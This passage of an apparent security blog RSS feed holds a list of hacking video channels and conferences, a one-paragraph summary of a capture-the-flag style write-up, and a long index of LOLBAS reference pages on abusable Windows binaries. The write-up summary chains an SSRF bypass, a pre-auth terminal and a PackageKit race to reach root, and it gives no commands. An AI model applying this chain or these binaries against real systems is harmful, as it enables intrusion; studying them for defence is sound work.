&lt;li&gt;&lt;a href="https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q"&gt;The Hated one&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@tib3rius"&gt;Tib3rius - CTF walkthroughs, deep dives, web app hacking, and more!&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@xct_de"&gt;xct hacks&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="conferences" class="anchored-heading"&gt;Conferences&lt;a class="heading-anchor" href="#conferences" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@blackalpscybersecurityconf8699"&gt;BlackAlps CyberSecurityConference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/user/DEFCONConference/videos"&gt;DEFCON Conference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@DEFCONParis"&gt;DEFCON Paris&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/user/hackinparis"&gt;Hack In Paris&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@hexacon4091"&gt;Hexacon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@scrtinsomnihack"&gt;INSOMNI&amp;rsquo;HACK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/user/hzvprod"&gt;LeHack / HZV&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@OffensiveCon"&gt;OffensiveCon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@OrangeCon"&gt;OrangeCon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://peertube.esnhack.fr/"&gt;Peertube ESNHACK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@reconmtl"&gt;Recon Conference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/@ReconVillage"&gt;Recon Village&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/c/x33fcon"&gt;x33fcon Conference&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="curated-videos" class="anchored-heading"&gt;Curated Videos&lt;a class="heading-anchor" href="#curated-videos" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=dsekKYNLBbc"&gt;BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=9ix3h7NQxFU&amp;amp;pp=ygUWaG93IHRvIGJlY29tZSBhIGhhY2tlcg%3D%3D"&gt;How to become a hacker - Alisa Esage&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=mQjTgDuLsp4"&gt;Hunting for Top Bounties - Nicolas Grégoire&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=KDo68Laayh8"&gt;Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=0tEnnvZbYek"&gt;The Conscience of a Hacker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=aOGFY1R4QQ4"&gt;HACKING GOOGLE Series&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://youtu.be/przDcQe6n5o"&gt;EP000: Operation Aurora | HACKING GOOGLE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://youtu.be/N7N4EC20-cM"&gt;EP001: Threat Analysis Group | HACKING GOOGLE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://youtu.be/QZ0cpBocl3c"&gt;EP002: Detection and Response | HACKING GOOGLE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://youtu.be/TusQWn2TQxQ"&gt;EP003: Red Team | HACKING GOOGLE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://youtu.be/IoXiXlCNoXg"&gt;EP004: Bug Hunters | HACKING GOOGLE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://youtu.be/My_13FXODdU"&gt;EP005: Project Zero | HACKING GOOGLE&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Cohort</title><link>https://bokkapig.pages.dev/writeups/cohort/</link><pubDate>Sat, 01 Aug 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/cohort/</guid><description>An internal marimo notebook server — discovered by bypassing an SSRF host blocklist on the Cohort Analytics &amp;lsquo;source validator&amp;rsquo; — exposed the unauthenticated /terminal/ws endpoint (CVE-2026-39987), granting a pre-auth PTY as marimo. Privilege escalation abused a deliberately held-back PackageKit (CVE-2026-41651, &amp;lsquo;Pack2TheRoot&amp;rsquo;): a TOCTOU race in the D-Bus InstallFiles transaction let an unprivileged user install a malicious .deb whose postinst ran as root, dropping a SUID bash.</description></item><item><title>AccCheckConsole.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/acccheckconsole/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/acccheckconsole/</guid><description/></item><item><title>AddinUtil.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/addinutil/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/addinutil/</guid><description/></item><item><title>adplus.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/adplus/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/adplus/</guid><description/></item><item><title>Advpack.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/advpack/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/advpack/</guid><description/></item><item><title>AgentExecutor.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/agentexecutor/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/agentexecutor/</guid><description/></item><item><title>AppCert.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/appcert/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/appcert/</guid><description/></item><item><title>AppInstaller.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/appinstaller/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/appinstaller/</guid><description/></item><item><title>AppLauncher.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/applauncher/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/applauncher/</guid><description/></item><item><title>Appvlp.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/appvlp/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/appvlp/</guid><description/></item><item><title>Aspnet_Compiler.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/aspnet-compiler/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/aspnet-compiler/</guid><description/></item><item><title>At.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/at/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/at/</guid><description/></item><item><title>Atbroker.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/atbroker/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/atbroker/</guid><description/></item><item><title>Bash.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/bash/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/bash/</guid><description/></item><item><title>Bcp.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/bcp/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/bcp/</guid><description/></item><item><title>Bginfo.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/bginfo/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/bginfo/</guid><description/></item><item><title>Bitsadmin.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/bitsadmin/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/bitsadmin/</guid><description/></item><item><title>Cdb.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/cdb/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/cdb/</guid><description/></item><item><title>CertOC.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/certoc/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/certoc/</guid><description/></item><item><title>CertReq.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/certreq/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/certreq/</guid><description/></item><item><title>Certutil.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/certutil/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/certutil/</guid><description/></item><item><title>Change.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/change/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/change/</guid><description/></item><item><title>Cipher.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/cipher/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/cipher/</guid><description/></item><item><title>CL_Invocation.ps1</title><link>https://bokkapig.pages.dev/refs/lolbas/cl-invocation/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/cl-invocation/</guid><description/></item><item><title>CL_LoadAssembly.ps1</title><link>https://bokkapig.pages.dev/refs/lolbas/cl-loadassembly/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/cl-loadassembly/</guid><description/></item><item><title>CL_Mutexverifiers.ps1</title><link>https://bokkapig.pages.dev/refs/lolbas/cl-mutexverifiers/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/cl-mutexverifiers/</guid><description/></item><item><title>Cmd.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/cmd/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/cmd/</guid><description/></item><item><title>Cmdkey.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/cmdkey/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/cmdkey/</guid><description/></item><item><title>cmdl32.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/cmdl32/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/cmdl32/</guid><description/></item><item><title>Cmstp.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/cmstp/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/cmstp/</guid><description/></item><item><title>code.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/code/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/code/</guid><description/></item><item><title>Colorcpl.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/colorcpl/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/colorcpl/</guid><description/></item><item><title>ComputerDefaults.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/computerdefaults/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/computerdefaults/</guid><description/></item><item><title>Comsvcs.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/comsvcs/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/comsvcs/</guid><description/></item><item><title>ConfigSecurityPolicy.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/configsecuritypolicy/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/configsecuritypolicy/</guid><description/></item><item><title>Conhost.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/conhost/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/conhost/</guid><description/></item><item><title>Control.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/control/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/control/</guid><description/></item><item><title>coregen.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/coregen/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/coregen/</guid><description/></item><item><title>Createdump.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/createdump/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/createdump/</guid><description/></item><item><title>Csc.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/csc/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/csc/</guid><description/></item><item><title>Cscript.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/cscript/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/cscript/</guid><description/></item><item><title>csi.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/csi/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/csi/</guid><description/></item><item><title>CustomShellHost.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/customshellhost/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/customshellhost/</guid><description/></item><item><title>DataSvcUtil.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/datasvcutil/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/datasvcutil/</guid><description/></item><item><title>DefaultPack.EXE</title><link>https://bokkapig.pages.dev/refs/lolbas/defaultpack/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/defaultpack/</guid><description/></item><item><title>Desk.cpl</title><link>https://bokkapig.pages.dev/refs/lolbas/desk/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/desk/</guid><description/></item><item><title>Desktopimgdownldr.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/desktopimgdownldr/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/desktopimgdownldr/</guid><description/></item><item><title>DeviceCredentialDeployment.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/devicecredentialdeployment/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/devicecredentialdeployment/</guid><description/></item><item><title>Devinit.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/devinit/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/devinit/</guid><description/></item><item><title>Devtoolslauncher.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/devtoolslauncher/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/devtoolslauncher/</guid><description/></item><item><title>devtunnel.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/devtunnel/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/devtunnel/</guid><description/></item><item><title>Dfshim.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/dfshim/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/dfshim/</guid><description/></item><item><title>Dfsvc.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/dfsvc/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/dfsvc/</guid><description/></item><item><title>Diantz.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/diantz/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/diantz/</guid><description/></item><item><title>Diskshadow.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/diskshadow/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/diskshadow/</guid><description/></item><item><title>Dnscmd.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/dnscmd/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/dnscmd/</guid><description/></item><item><title>dnx.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/dnx/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/dnx/</guid><description/></item><item><title>Dotnet.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/dotnet/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/dotnet/</guid><description/></item><item><title>dsdbutil.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/dsdbutil/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/dsdbutil/</guid><description/></item><item><title>dtutil.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/dtutil/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/dtutil/</guid><description/></item><item><title>Dump64.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/dump64/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/dump64/</guid><description/></item><item><title>DumpMinitool.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/dumpminitool/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/dumpminitool/</guid><description/></item><item><title>Dxcap.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/dxcap/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/dxcap/</guid><description/></item><item><title>ECMangen.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ecmangen/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ecmangen/</guid><description/></item><item><title>Esentutl.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/esentutl/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/esentutl/</guid><description/></item><item><title>Eudcedit.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/eudcedit/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/eudcedit/</guid><description/></item><item><title>Eventvwr.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/eventvwr/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/eventvwr/</guid><description/></item><item><title>Excel.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/excel/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/excel/</guid><description/></item><item><title>Expand.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/expand/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/expand/</guid><description/></item><item><title>Explorer.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/explorer/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/explorer/</guid><description/></item><item><title>Extexport.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/extexport/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/extexport/</guid><description/></item><item><title>Extrac32.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/extrac32/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/extrac32/</guid><description/></item><item><title>Findstr.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/findstr/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/findstr/</guid><description/></item><item><title>Finger.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/finger/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/finger/</guid><description/></item><item><title>fltMC.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/fltmc/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/fltmc/</guid><description/></item><item><title>Forfiles.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/forfiles/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/forfiles/</guid><description/></item><item><title>Fsi.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/fsi/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/fsi/</guid><description/></item><item><title>FsiAnyCpu.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/fsianycpu/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/fsianycpu/</guid><description/></item><item><title>Fsutil.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/fsutil/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/fsutil/</guid><description/></item><item><title>Ftp.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ftp/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ftp/</guid><description/></item><item><title>GfxDownloadWrapper.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/gfxdownloadwrapper/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/gfxdownloadwrapper/</guid><description/></item><item><title>Gpscript.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/gpscript/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/gpscript/</guid><description/></item><item><title>Hh.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/hh/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/hh/</guid><description/></item><item><title>Ie4uinit.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ie4uinit/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ie4uinit/</guid><description/></item><item><title>Ieadvpack.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/ieadvpack/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ieadvpack/</guid><description/></item><item><title>iediagcmd.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/iediagcmd/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/iediagcmd/</guid><description/></item><item><title>Ieexec.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ieexec/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ieexec/</guid><description/></item><item><title>Ieframe.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/ieframe/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ieframe/</guid><description/></item><item><title>Ilasm.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ilasm/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ilasm/</guid><description/></item><item><title>IMEWDBLD.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/imewdbld/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/imewdbld/</guid><description/></item><item><title>Infdefaultinstall.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/infdefaultinstall/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/infdefaultinstall/</guid><description/></item><item><title>Installutil.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/installutil/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/installutil/</guid><description/></item><item><title>IntelliTrace.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/intellitrace/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/intellitrace/</guid><description/></item><item><title>iscsicpl.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/iscsicpl/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/iscsicpl/</guid><description/></item><item><title>Jsc.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/jsc/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/jsc/</guid><description/></item><item><title>Launch-VsDevShell.ps1</title><link>https://bokkapig.pages.dev/refs/lolbas/launch-vsdevshell/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/launch-vsdevshell/</guid><description/></item><item><title>Ldifde.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ldifde/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ldifde/</guid><description/></item><item><title>Logger.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/logger/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/logger/</guid><description/></item><item><title>Makecab.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/makecab/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/makecab/</guid><description/></item><item><title>Manage-bde.wsf</title><link>https://bokkapig.pages.dev/refs/lolbas/manage-bde/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/manage-bde/</guid><description/></item><item><title>Mavinject.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/mavinject/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mavinject/</guid><description/></item><item><title>Mftrace.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/mftrace/</link><pubDate>Fri, 31 Jul 2026 